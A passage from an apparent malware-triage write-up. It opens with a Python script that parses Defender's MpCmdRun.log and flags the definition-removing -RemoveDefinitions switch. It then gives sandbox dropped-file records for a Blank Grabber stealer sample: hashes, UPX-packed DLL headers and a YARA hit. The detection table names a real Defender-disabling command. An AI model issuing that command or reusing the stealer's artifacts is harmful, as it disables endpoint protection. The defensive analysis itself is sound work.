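class MpCmdRunEntry:
    command_line: str
    start_time: Optional[str] = None
    end_time: Optional[str] = None
    operations: List[str] = field(default_factory=list)   # "Start: ..." lines


# Switches that weaken Defender. Only the one this sample used is listed;
# extend the table for your own environment.
TAMPER_SWITCHES: Dict[str, str] = {
    "-removedefinitions": "removes Defender signatures/engine (-All, -Engine or -DynamicSignatures)",
}


def decode_mpcmdrun_log(data: bytes) -> str:
    """Decode the log as Defender writes it (UTF-16LE BOM); tolerate plain UTF-8."""
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le", errors="replace")
    else:
        text = data.decode("utf-8", errors="replace")
    # Drop the left-to-right marks so timestamps compare as plain ASCII.
    return text.replace("\u200e", "")


def parse_mpcmdrun_log(data: bytes) -> List[MpCmdRunEntry]:
    """Group the log into one entry per 'MpCmdRun: Command Line:' block."""
    entries: List[MpCmdRunEntry] = []
    current: Optional[MpCmdRunEntry] = None
    for raw in decode_mpcmdrun_log(data).splitlines():
        line = raw.strip()
        if line.startswith("MpCmdRun: Command Line:"):
            # maxsplit=2 keeps the drive-letter colon inside the command line intact
            current = MpCmdRunEntry(command_line=line.split(":", 2)[2].strip())
            entries.append(current)
        elif current is None:
            continue                      # separator or noise before the first block
        elif line.startswith("Start Time:"):
            current.start_time = line[len("Start Time:"):].strip()
        elif line.startswith("MpCmdRun: End Time:"):
            current.end_time = line[len("MpCmdRun: End Time:"):].strip()
        elif line.startswith("Start:"):
            current.operations.append(line[len("Start:"):].strip())
    return entries


def command_switches(command_line: str) -> List[str]:
    """Tokenise respecting double quotes; return lower-cased -switches only."""
    tokens = re.findall(r'"[^"]*"|\S+', command_line)
    return [t.lower() for t in tokens if t.startswith(("-", "/"))]


def flag_defender_tampering(entries: List[MpCmdRunEntry]) -> List[Dict[str, object]]:
    """One finding per tampering switch seen; 'executed' is True when the
    engine logged the matching 'Start: MpRemoveDefinitions(...)' operation."""
    findings: List[Dict[str, object]] = []
    for entry in entries:
        switches = command_switches(entry.command_line)
        for sw in switches:
            if sw in TAMPER_SWITCHES:
                findings.append({
                    "switch": sw,
                    "switches": switches,
                    "start_time": entry.start_time,
                    "executed": any(op.startswith("MpRemoveDefinitions") for op in entry.operations),
                    "reason": TAMPER_SWITCHES[sw],
                })
    return findings


if __name__ == "__main__":
    for finding in flag_defender_tampering(parse_mpcmdrun_log(SAMPLE_LOG)):
        print(finding)
```

Run it against a copy of MpCmdRun.log pulled from a suspect host (`parse_mpcmdrun_log(open(path, "rb").read())`). The "executed" flag matters in triage: a -RemoveDefinitions command line alone could be an interrupted attempt, while the "Start: MpRemoveDefinitions(1)" operation line, as in this sample, shows the engine carried it out, so the host needs a fresh signature update before any Defender-based scan is trusted.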
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Sun Jan 5 07:36:01 2025, 1st section name ".debug$S"
Category: modified
Size (bytes): 1380
Entropy (8bit): 4.146035591526891
Encrypted: false
SSDEEP: 24:HrgDW9/5XAZHtwKW4tXNeI+ycuZhNVakSjPNnqSGd:LlJAZuKNBw1ulVa3JqS2
MD5: BB940C5AFA6B2BCCE382B6BE8E0DAB94
SHA1: ABE12DF994EADCFB62734E214B6A42FBBBE051BB
SHA-256: F720D71990193D65F77095A282AB344EA8365E9A474333CF525AF135E2544EF0
SHA-512: A16A9E11FCA4D75B9ED5CC049E52B13ED5962CE76565696D7EC22BE47B6A95C1AD7C7A4875715D3F1BEB5A2909F9A37982A13362833FF7259CC2D625B6B5FB72
Malicious: false
Preview: L...a6zg.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........W....c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP................&:.x.P....[..w...........7.......C:\Users\user~1\AppData\Local\Temp\RES5209.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.x.z.y.3.0.0...d.l.l.....(.....


Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):120400
Entropy (8bit):6.6017475353076716
Encrypted:false
SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA1:EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: riFSkYVMKB.exe, Detection: malicious
• Filename: mcgen.exe, Detection: malicious
• Filename: AimStar.exe, Detection: malicious
• Filename: DChOtFdp9T.exe, Detection: malicious
• Filename: user.exe, Detection: malicious
• Filename: HX Design.exe, Detection: malicious
• Filename: YgJ5inWPQO.exe, Detection: malicious
• Filename: wp-s2.exe, Detection: malicious
• Filename: wp-s2.exe, Detection: malicious
• Filename: wp-cent.exe, Detection: malicious

Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49944
Entropy (8bit):7.790464947091356
Encrypted:false
SSDEEP:768:JpidZ+u7Tclz8mYAR9jL7GWLRsYIe+9ZypJEIvCVH0S5YiSyv4AMxkEd:idYuTeh9jLN+BXIEIvCVHV7Sy+xJ
MD5:1D9398C54C80C0EF2F00A67FC7C9A401
SHA1:858880173905E571C81A4A62A398923483F98E70
SHA-256:89006952BEE2B38D1B5C54CC055D8868D06C43E94CD9D9E0D00A716C5F3856FA
SHA-512:806300D5820206E8F80639CCB1FBA685AAFA66A9528416102AEB28421E77784939285A88A67FAD01B818F817A91382145322F993D855211F10E7BA3F5563A596
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):60696
Entropy (8bit):7.8398712444446845
Encrypted:false
SSDEEP:1536:FV+aMfd4DTR6Ukvr/MUCXKxGIe/qxUuj9IvLP3C7SyIxmL:uaMfd4D963/rC6/UuRIvLP3CjL
MD5:2401460A376C597EDCE907F31EC67FBC
SHA1:7F723E755CB9BFEAC79E3B49215DD41FDB5C2D90
SHA-256:4F3F99B69834C43DAC5C3F309CB0BD56C07E8C2AC555DE4923FA2DDC27801960
SHA-512:9E77D666C6B74CFB6287775333456CCE43FEB51EC39AD869C3350B1308E01AD9B9C476C8FA6251FE8AD4AB1175994902A4AD670493B95EB52ADB3D4606C0B633
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):110360
Entropy (8bit):7.936298430802442
Encrypted:false
SSDEEP:3072:7RimMfx90veyiqn/2lwhqLGaRIvOqZ7Iqc:aD5qnY6B7/c
MD5:DF361EA0C714B1A9D8CF9FCF6A907065
SHA1:102115EC2E550A8A8CAD5949530CCA9993250C76
SHA-256:F78EE4524EB6E9885B9CBDB125B2F335864F51E9C36DC18FDCCB5050926ADFFE
SHA-512:B1259DF9167F89F8DF82BDA1A21A26EE7EB4824B97791E7BBAA3E57B50AE60676762FD598C8576D4E6330FFAF12972A31DB2F17B244C5301DCF29FE4ABFBA43F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):36632
Entropy (8bit):7.678631968364815
Encrypted:false
SSDEEP:768:PbKdUeBIro4sU/QKPpFTvIvOIiX5YiSyv/AMxkEU:PG9Ws9K7TvIvOIiJ7Sy3xg
MD5:D4C05F1C17AC3EB482B3D86399C9BAAE
SHA1:81B9A3DD8A5078C7696C90FBD4CF7E3762F479A5
SHA-256:86BD72B13A47693E605A0DE1112C9998D12E737644E7A101AC396D402E25CF2F
SHA-512:F81379D81361365C63D45D56534C042D32EE52CAD2C25607794FE90057DCDEEB2B3C1FF1D2162F9C1BDF72871F4DA56E7C942B1C1AD829C89BF532FB3B04242E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):88344
Entropy (8bit):7.921783356541484
Encrypted:false
SSDEEP:1536:eIGaRru59ZAec90CDOOgOxjdqNWibksK3zOAOdS8Ujd1lXIvZ1ME7SykxG:do59ZAd9HDOONZibkDudKNIvZ1MEB
MD5:E0FA126B354B796F9735E07E306573E1
SHA1:18901CE5F9A1F6B158F27C4A3E31E183AA83251B
SHA-256:E0DC01233B16318CD21CA13570B8FDF4808657EC7D0CC3E7656B09CCF563DC3E
SHA-512:DD38100889C55BFFC6C4B882658ECD68A79257BC1FFD10F0F46E13E79BFF3FC0F908AE885CC4A5FED035BD399860B923C90EF75E203B076B14069BF87610F138
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,..:,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..V,.V.,..-.V.,Rich.V.,........PE..d....g.f.........." ...). ................................................................`.........................................4...L....................@.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process: C:\Users\user\Desktop\X9g8L63QGs.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 26904
Entropy (8bit): 7.474791946859441
Encrypted: false
SSDEEP: 384:0V7dtcA8ZxHkZm+J/ifZa7gJXFHPIvQUiNdHQIYiSy1pCQkefAM+o/8E9VF0NyfC:27dtdGpBPIvQUiL5YiSyvRfAMxkE4
MD5: 84AA87C6DD11A474BE70149614976B89
SHA1: C31F98EC19FC36713D1D7D077AD4176DB351F370
SHA-256: 6066DF940D183CF218A5053100E474D1F96BE0A4E4EE7C09B31EA303FF56E21B
SHA-512: 11B9F8E39C14C17788CC8F1FDDD458D70B5F9EF50A3BDB0966548DDCB077FF1BF8CA338B02E45EC0B2E97A5EDBE39481DD0E734119BC1708DEF559A0508ADC42
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........%.........................................................................I...........Rich...................PE..d....g.f.........." ...).0..........0.....................................................`.............................................L.......P............`..............<.......................................0...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\X9g8L63QGs.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 45336
Entropy (8bit): 7.725792098328606
Encrypted: false
SSDEEP: 768:1NDTv9rez/QuT6QgD2liUHE559OF3tHvXrx2+pNb8IvLwXBk5YiSyvZAMxkE+ND:1hv9rerTPgK0UH659OFdXrgQb8IvLwX9
MD5: 1D982F4D97EE5E5D4D89FE94B7841A43
SHA1: 7F92FE214183A5C2A8979154ECE86AAD3C8120C6
SHA-256: 368CF569ADC4B8D2C981274F22181FEA6E7CE4FA09B3A5D883B0FF0BA825049D
SHA-512: 9ECDCF9B3E8DC7999D2FA8B3E3189F4B59AE3A088C4B92EAA79385ED412F3379EBE2F30245A95D158051DBD708A5C9941C150B9C3B480BE7E1C2BBA6DEA5CB24
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,...Ml}.Ml}.Ml}.5.}.Ml}..m|.Ml}..o|.Ml}..h|.Ml}..i|.Ml}..m|.Ml}.Mm}.Ml}.5m|.Ml}..a|.Ml}..l|.Ml}..}.Ml}..n|.Ml}Rich.Ml}................PE..d....g.f.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\X9g8L63QGs.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 59160
Entropy (8bit): 7.855211366058935
Encrypted: false
SSDEEP: 1536:+dnfbpdoq4M+GCLtNWfmR9dki/W9sFCIvOQn87SyP1xb:+df1dsM+TtUOR3z+9sEIvOQn8J
MD5: 3911AE916C6E4BF99FE3296C3E5828CA
SHA1: 87165CBF8EA18B94216AC2D1FFE46F22EDDB0434
SHA-256: 3EC855C00585DB0246B56F04D11615304931E03066CB9FC760ED598C34D85A1F
SHA-512: 5C30ED540FDFA199CDF56E73C9A13E9AC098F47244B076C70056FD4BF46F5B059CB4B9CDB0E03568CA9C93721622C793D6C659704AF400BD3E20767D1893827E
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V^.70..70..70..O...70...1..70.....70...3..70...4..70...5..70..1..70..O1..70..71..60..=..70..0..70....70..2..70.Rich.70.........................PE..d....g.f.........." ...).........p..@........................................@............`..........................................;..P....9.......0..........D............;......................................@&..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\X9g8L63QGs.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 67864
Entropy (8bit): 7.844769254760915
Encrypted: false
SSDEEP: 1536:kW6i4cCNOKktLpFgXyZoNSNrNIvC7M/o7SyOExJ:kW6i3SOKktgHNSNhIvC7MA/
MD5: 68E9EB3026FA037EE702016B7EB29E1B
SHA1: 60C39DEC3F9FB84B5255887A1D7610A245E8562E
SHA-256: 2AE5C1BDD1E691675BB028EFD5185A4FA517AC46C9EF76AF23C96344455ECC79
SHA-512: 50A919A9E728350005E83D5DD51EBCA537AFE5EB4739FEE1F6A44A9309B137BB1F48581BAFA490B2139CF6F035D80379BF6FFCDFF7F4F1A1DE930BA3F508C1AF
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I.^.(k..(k..(k..P...(k...j..(k...h..(k...o..(k...n..(k..j..(k...j..(k..(j..)k..Pj..(k..f..(k..k..(k.....(k..i..(k.Rich.(k.........PE..d....g.f.........." ...).........@.......P...................................0............`.........................................l,..d....)....... ..........D............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\X9g8L63QGs.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 1332793
Entropy (8bit): 5.5865879348515195
Encrypted: false
SSDEEP: 12288:f8lJGUqc4rmn9OPNsxuy4htMHc1b4oDAs/SquRROzBMdmyP/H/V949/Rr2/Hg:f8lJGUU697ls30yMdmyPvP4t2/Hg
MD5: BED03063E08A571088685625544CE144
SHA1: 56519A1B60314EC43F3AF0C5268ECC4647239BA3
SHA-256: 0D960743DBF746817B61FF7DD1C8C99B4F8C915DE26946BE56118CD6BEDAEBDC
SHA-512: C136E16DB86F94B007DB42A9BF485A7C255DCC2843B40337E8F22A67028117F5BD5D48F7C1034D7446BB45EA16E530F1216D22740DDB7FAB5B39CC33D4C6D995
Malicious: false
Preview: PK..........!....uS...S......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........

Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):115559
Entropy (8bit):7.723718868633777
Encrypted:false
SSDEEP:1536:w9JWdct2jB5C23NFb4t4xK5OyqBsbpfdvwMVzWyz+mF4Bc9a3Y76DlhLxhm07ZPR:JcIXtdUkK7ZfK0zr46l7omEZP+Pu
MD5:9ECBE007F6D77B27B5C03B80C18BD2C2
SHA1:FB2E7782CD7250E78FA44CB49A2BE0A93439AB76
SHA-256:5A69D11EC9CA86133EDB2CB1D2CF024EBA04D33831BD5E6062F333C1C89C1D4A
SHA-512:027CF2CCAB595A87A1B7C0FD9C3EA5E4F6A8C93A2EF5C76CA4C1324A28BB15872D584D4798D77191403578BD94BC54E5E8CFB0F2759F04983327F0E2B5BC7306
Malicious:false
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1630488
Entropy (8bit):7.952879310777133
Encrypted:false
SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:8377FE5949527DD7BE7B827CB1FFD324
SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29968
Entropy (8bit):7.677818197322094
Encrypted:false
SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:08B000C3D990BC018FCB91A1E175E06E
SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):227096
Entropy (8bit):7.928768674438361
Encrypted:false
SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1809688
Entropy (8bit):7.993892045374985
Encrypted:true
SSDEEP:49152:3mXQjykoELSGO8z8teBQ7Qk/wfj/B6aGhjQ+owM7ehd:2X2R1LSG3Q7Jo+jZAehd
MD5:2996CBF9598EB07A64D66D4C3ABA4B10
SHA1:AC176AB53CDEF472770D27A38DB5BD6EB71A5627
SHA-256:FEBA57A74856DEDB9D9734D12C640CA7F808EAD2DB1E76A0F2BCF1E4561CD03F
SHA-512:667E117683D94AE13E15168C477800F1CD8D840E316890EC6F41A6E4CEFD608536655F3F6D7065C51C6B1B8E60DD19AA44DA3F9E8A70B94161FD7DC3ABF5726C
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.key, Author: Joe Security
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26392
Entropy (8bit):7.4742652119544415
Encrypted:false
SSDEEP:768:hGXglQPhKpYj2IvQGi15YiSyvIKAMxkEtH:h3lyLj2IvQGib7Sywoxx
MD5:0433850F6F3DDD30A85EFC839FBDB124
SHA1:07F092AE1B1EFD378424BA1B9F639E37D1DC8CB9
SHA-256:290C0A19CD41E8B8570B8B19E09C0E5B1050F75F06450729726193CF645E406C
SHA-512:8E785085640DB504496064A3C3D1B72FEAB6B3F0BC33676795601A67FCF410BAA9A6CD79F6404829B47FD6AFCD9A75494D0228D7109C73D291093CD6A42447FF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):659224
Entropy (8bit):7.993485985128715
Encrypted:true
SSDEEP:12288:+I2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRN/0Gk3KjQz:+bxYw+AXSskaSweZ91uMu80/MFakz
MD5:19EFDD227EE57E5181FA7CEB08A42AA1
SHA1:5737ADF3A6B5D2B54CC1BACE4FC65C4A5AAFDE50
SHA-256:8A77B2C76440365EE3E6E2F589A78AD53F2086B1451B5BAA0C4BFE3B6EE1C49D
SHA-512:77DB2FE6433E6A80042A091F86689186B877E28039A6AEAA8B2B7D67C8056372D04A1A8AFDB9FE92CFAEA30680E8AFEB6B597D2ECF2D97E5D3B693605B392997
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\X9g8L63QGs.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):302872
Entropy (8bit):7.987647920176007
Encrypted:false
SSDEEP:6144:WL4g17Ziz1gCtki0R7KjUAkDvN/mMHvmCMztFY3oudYnc3nSX7:WL4Q7Qz1pknmIhxsQKcXSr
MD5:382CD9FF41CC49DDC867B5FF23EF4947
SHA1:7E8EF1E8EAAE696AEA56E53B2FB073D329CCD9D6
SHA-256:8915462BC034088DB6FDB32A9B3E3FCFE5343D64649499F66FFB8ADA4D0AD5F2
SHA-512:4E911B5FB8D460BFE5CB09EAB74F67C0F4B5F23A693D1FF442379F49A97DA8FED65067EB80A8DBEEDB6FEEBC45F0E3B03958BD920D582FFB18C13C1F8C7B4FC4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe
File Type:RAR archive data, v5
Category:modified
Size (bytes):753950
Entropy (8bit):7.999747563986138
Encrypted:true
SSDEEP:12288:WQ49LgOWrjoBxrFWtWEc877AbInF/Z6BdtZRiFF/Y75tvlP4LAubkn9r1YNYiwyw:WQYWr0BBFgvrr6rtZgTQtttsbk9r1YNa
MD5:D6C8AE175D1193CF0E37896716F47496
SHA1:DCB6990AFB099DAA73AAEB8B4EB1B45708CA4EA9
SHA-256:1CA19D281A279BD4F028E80041495F6AC2CA3E1DF61C348FD2BC42630F062505
SHA-512:666AA92AE84956F6F8DDE773C08E8B1A7C5526D1CADFD9B470605B55E349347A001703660AC6C45B72D8AF16C992C81870A29FB7E4DB5BAC37A15953B7237B8D
Malicious:false
Preview:Rar!.......{!.......".IE.<=\.....AC.@..#..V....<....)Ia ....:m..^...s.C..^4.F..A&c.{.sCp....}.. ?....N....^.<.$.>P.........r.....ZI....~..H...Ne.....?[..3S.Mt..L.zC.P.Rt.`..K.!..7PX...c....pG..@.....V....FWZeJ.&|uU..l.{...M.>..........!.2@.)|.$..n.=..u.g..i...e%..XH.{.7~...L..f.....z..Y...v.MX.....(..W.~...w..$<.....z..{..3....1+FkZ.......-.s.%9.J..J. .$.i.....pQ....:..1x..m..>m\Y..2....A.....909..A.@}G..?....:...jg...mtL.#")..e..C.SL.Z...Ku.*.q......V....A..$...W..@j)..B.......G....8..X}.X..s..M..3?._.|.F.C.B.8}u..:..E...... .x......;t}..!.-.^...9."o...DdB....3(..5I>......|...'>..O/(.#.samq~....'.......Of{ 4Ju........e.SQ...Y.z.l..s..........@bB.....<..M/.c.|]..."0.a..;}C.U.Bv.YB..sZ.w..I.....k......DCu....XWJ1......)...b2..i`].T...SP.YQJ..E..GT.K...2t.*.o....aCn.U|.S....A......B.'..Jh.n<i............7.6p._Kx.dm^....D.s.....Y.....&......Vv.4.ln..%d...T.[.?W%P....r..!.4^.B0.YF..R,dMk.r.....52.:q9..-........[......!.%..q4=.E.|.'.
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.095667326219972
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHak7YnqqjPN5Dlq5J:+RI+ycuZhNVakSjPNnqX
MD5:263AED78BB50ADC8E5B7E45BA8FE77F5
